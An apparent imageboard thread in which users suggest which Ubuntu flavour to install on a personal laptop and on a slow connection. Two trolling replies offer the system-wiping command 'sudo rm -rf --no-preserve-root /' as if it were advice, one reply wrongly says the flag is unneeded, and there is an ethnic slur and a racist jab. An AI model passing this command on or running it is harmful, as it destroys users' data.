Which ones?
Which ones?
Other urls found in this thread:
What distro?
Select the Gentoo option
>Ubuntu desktop
Pretty obvious no?
mm idont know it could have been debian minimal or smth. So ubuntu minimal ok
If a server, LAMP, Samba and mail.
It's a personal use chinkpad
ubuntu GNOME
But do I get thumbnails in the file picker?
Kubuntu full.
I've had the unfortunate experience of using Firefox linked against GTK3. I didn't think it would be possible to make the file picker worse, but somehow they have.
sudo rm -rf --no-preserve-root
sudo apt-get install Windows 10 Pro
I hear kde is bloaty. Plus I'm on a 256kbps connection so waiting 10 hours doesn't sound appealing
>256kbps connection
>tfw 144p on YouTube sometimes lags
It hurts to live
L/Xubuntu in that case.
>256 kbps
Alternatively, you can have all of the debian dvds mailed to you. It was the only choice for a complete desktop environment when my connection was the pittance.
You deserve it rajesh
sudo rm -rf --no-preserve-root /
I don't think you even need to include no-preserve-root